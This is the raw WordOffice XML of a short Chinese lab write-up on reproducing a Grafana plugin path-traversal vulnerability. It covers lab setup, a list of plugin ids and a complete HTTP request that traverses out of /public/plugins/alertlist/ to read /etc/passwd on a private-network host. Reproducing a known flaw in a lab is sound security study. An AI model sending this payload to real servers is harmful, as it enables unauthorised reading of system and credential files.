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Default="00513BAE">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>一、靶场搭建</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00513BAE" w:rsidRDefault="00513BAE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513BAE" w:rsidRDefault="0025768F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0025768F">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5274310" cy="141212"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2" name="图片 2" descr="C:\Users\Toby\AppData\Local\Temp\165349154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91541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AE" w:rsidRDefault="00513BAE">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2、访问3</w:t>
      </w:r>
      <w:r>
        <w:t>000</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>端口</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00513BAE" w:rsidRDefault="0025768F">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="679F72AF" wp14:editId="2DEB735B">
            <wp:extent cx="5274310" cy="5831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68F" w:rsidRDefault="0025768F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00513BAE" w:rsidRDefault="00513BAE">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>二、漏洞复现</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00513BAE" w:rsidRDefault="00513B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5255895" cy="1404620"/>
                <wp:effectExtent l="0" t="0" r="20955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BAE" w:rsidRDefault="00513BAE" w:rsidP="00513BAE">
                            <w:r>
                              <w:t>alertlist</w:t>
                            </w:r>
                          </w:p>
                          <w:p w:rsidR="00513BAE" w:rsidRDefault="00513BAE" w:rsidP="00513BAE">
                            <w:r>
                              <w:t>cloudwatch</w:t>
                            </w:r>
                          </w:p>
                          <w:p w:rsidR="00513BAE" w:rsidRDefault="00513BAE" w:rsidP="00513BAE">
                            <w:r>
                              <w:t>dashlist</w:t>
                            </w:r>
                          </w:p>
                          <w:p w:rsidR="00513BAE" w:rsidRDefault="00513BAE" w:rsidP="00513BAE">
                            <w:r>
                              <w:t>elasticsearch</w:t>
                            </w:r>
                          </w:p>
                          <w:p w:rsidR="00513BAE" w:rsidRDefault="00513BAE" w:rsidP="00513BAE">
                            <w:r>
                              <w:t>graph</w:t>
                            </w:r>
                          </w:p>
                          <w:p w:rsidR="00513BAE" w:rsidRDefault="00513BAE" w:rsidP="00513BAE">
                            <w:r>
                              <w:t>graphite</w:t>
                            </w:r>
                          </w:p>
                          <w:p w:rsidR="00513BAE" w:rsidRDefault="00513BAE" w:rsidP="00513BAE">
                            <w:r>
                              <w:t>heatmap</w:t>
                            </w:r>
                          </w:p>
                          <w:p w:rsidR="00513BAE" w:rsidRDefault="00513BAE" w:rsidP="00513BAE">
                            <w:r>
                              <w:t>influxdb</w:t>
                            </w:r>
                          </w:p>
                          <w:p w:rsidR="00513BAE" w:rsidRDefault="00513BAE" w:rsidP="00513BAE">
                            <w:r>
                              <w:t>mysql</w:t>
                            </w:r>
                          </w:p>
                          <w:p w:rsidR="00513BAE" w:rsidRDefault="00513BAE" w:rsidP="00513BAE">
                            <w:r>
                              <w:t>opentsdb</w:t>
                            </w:r>
                          </w:p>
                          <w:p w:rsidR="00513BAE" w:rsidRDefault="00513BAE" w:rsidP="00513BAE">
                            <w:r>
                              <w:t>pluginlist</w:t>
                            </w:r>
                          </w:p>
                          <w:p w:rsidR="00513BAE" w:rsidRDefault="00513BAE" w:rsidP="00513BAE">
                            <w:r>
                              <w:t>postgres</w:t>
                            </w:r>
                          </w:p>
                          <w:p w:rsidR="00513BAE" w:rsidRDefault="00513BAE" w:rsidP="00513BAE">
                            <w:r>
                              <w:t>prometheus</w:t>
                            </w:r>
                          </w:p>
                          <w:p w:rsidR="00513BAE" w:rsidRDefault="00513BAE" w:rsidP="00513BAE">
                            <w:r>
                              <w:t>stackdriver</w:t>
                            </w:r>
                          </w:p>
                          <w:p w:rsidR="00513BAE" w:rsidRDefault="00513BAE" w:rsidP="00513BAE">
                            <w:r>
                              <w:t>table</w:t>
                            </w:r>
                          </w:p>
                          <w:p w:rsidR="00513BAE" w:rsidRDefault="00513BAE" w:rsidP="00513BAE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.55pt;width:413.8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">
                <v:textbox style="mso-fit-shape-to-text:t">
                  <w:txbxContent>
                    <w:p w:rsidR="00513BAE" w:rsidRDefault="00513BAE" w:rsidP="00513BAE">
                      <w:r>
                        <w:t>alertlist</w:t>
                      </w:r>
                    </w:p>
                    <w:p w:rsidR="00513BAE" w:rsidRDefault="00513BAE" w:rsidP="00513BAE">
                      <w:r>
                        <w:t>cloudwatch</w:t>
                      </w:r>
                    </w:p>
                    <w:p w:rsidR="00513BAE" w:rsidRDefault="00513BAE" w:rsidP="00513BAE">
                      <w:r>
                        <w:t>dashlist</w:t>
                      </w:r>
                    </w:p>
                    <w:p w:rsidR="00513BAE" w:rsidRDefault="00513BAE" w:rsidP="00513BAE">
                      <w:r>
                        <w:t>elasticsearch</w:t>
                      </w:r>
                    </w:p>
                    <w:p w:rsidR="00513BAE" w:rsidRDefault="00513BAE" w:rsidP="00513BAE">
                      <w:r>
                        <w:t>graph</w:t>
                      </w:r>
                    </w:p>
                    <w:p w:rsidR="00513BAE" w:rsidRDefault="00513BAE" w:rsidP="00513BAE">
                      <w:r>
                        <w:t>graphite</w:t>
                      </w:r>
                    </w:p>
                    <w:p w:rsidR="00513BAE" w:rsidRDefault="00513BAE" w:rsidP="00513BAE">
                      <w:r>
                        <w:t>heatmap</w:t>
                      </w:r>
                    </w:p>
                    <w:p w:rsidR="00513BAE" w:rsidRDefault="00513BAE" w:rsidP="00513BAE">
                      <w:r>
                        <w:t>influxdb</w:t>
                      </w:r>
                    </w:p>
                    <w:p w:rsidR="00513BAE" w:rsidRDefault="00513BAE" w:rsidP="00513BAE">
                      <w:r>
                        <w:t>mysql</w:t>
                      </w:r>
                    </w:p>
                    <w:p w:rsidR="00513BAE" w:rsidRDefault="00513BAE" w:rsidP="00513BAE">
                      <w:r>
                        <w:t>opentsdb</w:t>
                      </w:r>
                    </w:p>
                    <w:p w:rsidR="00513BAE" w:rsidRDefault="00513BAE" w:rsidP="00513BAE">
                      <w:r>
                        <w:t>pluginlist</w:t>
                      </w:r>
                    </w:p>
                    <w:p w:rsidR="00513BAE" w:rsidRDefault="00513BAE" w:rsidP="00513BAE">
                      <w:r>
                        <w:t>postgres</w:t>
                      </w:r>
                    </w:p>
                    <w:p w:rsidR="00513BAE" w:rsidRDefault="00513BAE" w:rsidP="00513BAE">
                      <w:r>
                        <w:t>prometheus</w:t>
                      </w:r>
                    </w:p>
                    <w:p w:rsidR="00513BAE" w:rsidRDefault="00513BAE" w:rsidP="00513BAE">
                      <w:r>
                        <w:t>stackdriver</w:t>
                      </w:r>
                    </w:p>
                    <w:p w:rsidR="00513BAE" w:rsidRDefault="00513BAE" w:rsidP="00513BAE">
                      <w:r>
                        <w:t>table</w:t>
                      </w:r>
                    </w:p>
                    <w:p w:rsidR="00513BAE" w:rsidRDefault="00513BAE" w:rsidP="00513BAE">
                      <w:r>
                        <w:t>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1、获取</w:t>
      </w:r>
      <w:r w:rsidR="0025768F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>以下任意</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>一个已安装的插件i</w:t>
      </w:r>
      <w:r>
        <w:t>d</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00513BAE" w:rsidRDefault="00513BAE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00513BAE" w:rsidRDefault="00513B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263797</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5251450" cy="1404620"/>
                <wp:effectExtent l="0" t="0" r="2540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BAE" w:rsidRDefault="00513BAE" w:rsidP="00513BAE">
                            <w:r>
                              <w:t>GET /public/plugins/alertlist/../../../../../../../../../../../../../etc/passwd HTTP/1.1</w:t>
                            </w:r>
                          </w:p>
                          <w:p w:rsidR="00513BAE" w:rsidRDefault="00513BAE" w:rsidP="00513BAE">
                            <w:r>
                              <w:t>Host: 192.168.1.112:3000</w:t>
                            </w:r>
                          </w:p>
                          <w:p w:rsidR="00513BAE" w:rsidRDefault="00513BAE" w:rsidP="00513BAE">
                            <w:r>
                              <w:t>Accept-Encoding: gzip, deflate</w:t>
                            </w:r>
                          </w:p>
                          <w:p w:rsidR="00513BAE" w:rsidRDefault="00513BAE" w:rsidP="00513BAE">
                            <w:r>
                              <w:t>Accept: */*</w:t>
                            </w:r>
                          </w:p>
                          <w:p w:rsidR="00513BAE" w:rsidRDefault="00513BAE" w:rsidP="00513BAE">
                            <w:r>
                              <w:t>Accept-Language: en</w:t>
                            </w:r>
                          </w:p>
                          <w:p w:rsidR="00513BAE" w:rsidRDefault="00513BAE" w:rsidP="00513BAE">
                            <w:r>
                              <w:t>User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36</w:t>
                            </w:r>
                          </w:p>
                          <w:p w:rsidR="00513BAE" w:rsidRDefault="00513BAE" w:rsidP="00513BAE">
                            <w:r>
                              <w:t>Connection: close</w:t>
                            </w:r>
                          </w:p>
                          <w:p w:rsidR="00513BAE" w:rsidRDefault="00513BA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0.75pt;width:41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">
                <v:textbox style="mso-fit-shape-to-text:t">
                  <w:txbxContent>
                    <w:p w:rsidR="00513BAE" w:rsidRDefault="00513BAE" w:rsidP="00513BAE">
                      <w:r>
                        <w:t>GET /public/plugins/alertlist/../../../../../../../../../../../../../etc/passwd HTTP/1.1</w:t>
                      </w:r>
                    </w:p>
                    <w:p w:rsidR="00513BAE" w:rsidRDefault="00513BAE" w:rsidP="00513BAE">
                      <w:r>
                        <w:t>Host: 192.168.1.112:3000</w:t>
                      </w:r>
                    </w:p>
                    <w:p w:rsidR="00513BAE" w:rsidRDefault="00513BAE" w:rsidP="00513BAE">
                      <w:r>
                        <w:t>Accept-Encoding: gzip, deflate</w:t>
                      </w:r>
                    </w:p>
                    <w:p w:rsidR="00513BAE" w:rsidRDefault="00513BAE" w:rsidP="00513BAE">
                      <w:r>
                        <w:t>Accept: */*</w:t>
                      </w:r>
                    </w:p>
                    <w:p w:rsidR="00513BAE" w:rsidRDefault="00513BAE" w:rsidP="00513BAE">
                      <w:r>
                        <w:t>Accept-Language: en</w:t>
                      </w:r>
                    </w:p>
                    <w:p w:rsidR="00513BAE" w:rsidRDefault="00513BAE" w:rsidP="00513BAE">
                      <w:r>
                        <w:t>User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36</w:t>
                      </w:r>
                    </w:p>
                    <w:p w:rsidR="00513BAE" w:rsidRDefault="00513BAE" w:rsidP="00513BAE">
                      <w:r>
                        <w:t>Connection: close</w:t>
                      </w:r>
                    </w:p>
                    <w:p w:rsidR="00513BAE" w:rsidRDefault="00513BAE"/>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="square" anchorx="margin"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、发送如下数据包</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00513BAE" w:rsidRDefault="002576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D81343" wp14:editId="64DC181B">
            <wp:extent cx="5274310" cy="3888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7C" w:rsidRDefault="00940B7C" w:rsidP="00513BAE">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="00940B7C" w:rsidRDefault="00940B7C" w:rsidP="0051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7C" w:rsidRDefault="00940B7C" w:rsidP="00513BAE">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="00940B7C" w:rsidRDefault="00940B7C" w:rsidP="00513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11"/>
    <w:rsid w:val="00167B11"/>
    <w:rsid w:val="0025768F"/>
    <w:rsid w:val="00513BAE"/>
    <w:rsid w:val="00940B7C"/>
    <w:rsid w:val="00D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F6921"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{7EC59136-E563-41E9-833D-952E49B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B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2022-05-25T14:47:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-05-25T15:15:00Z</dcterms:modified>
</cp:coreProperties>
</file>